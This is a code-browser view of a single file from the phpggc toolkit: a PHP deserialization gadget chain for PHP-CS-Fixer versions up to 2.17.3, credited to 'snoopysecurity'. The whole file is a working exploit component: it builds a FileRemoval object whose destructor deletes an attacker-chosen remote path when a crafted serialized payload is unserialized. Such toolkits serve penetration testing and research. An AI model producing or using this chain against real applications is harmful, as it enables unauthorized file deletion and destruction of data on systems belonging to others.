Codebase list phpggc / 1c51698 gadgetchains / PHPCSFixer / FD / 1 / chain.php
1c51698

Tree @1c51698 (Download .tar.gz)

chain.php @1c51698raw · history · blame

<?php
namespace GadgetChain\PHPCSFixer;

class FD1 extends \PHPGGC\GadgetChain\FileDelete
{
    public static $version = '<= 2.17.3';
    public static $vector = '__destruct';
    public static $author = 'snoopysecurity';

    public function generate(array $parameters)
    {
        $remote_path = $parameters["remote_path"];

        return new \PhpCsFixer\FileRemoval($remote_path);
    }
}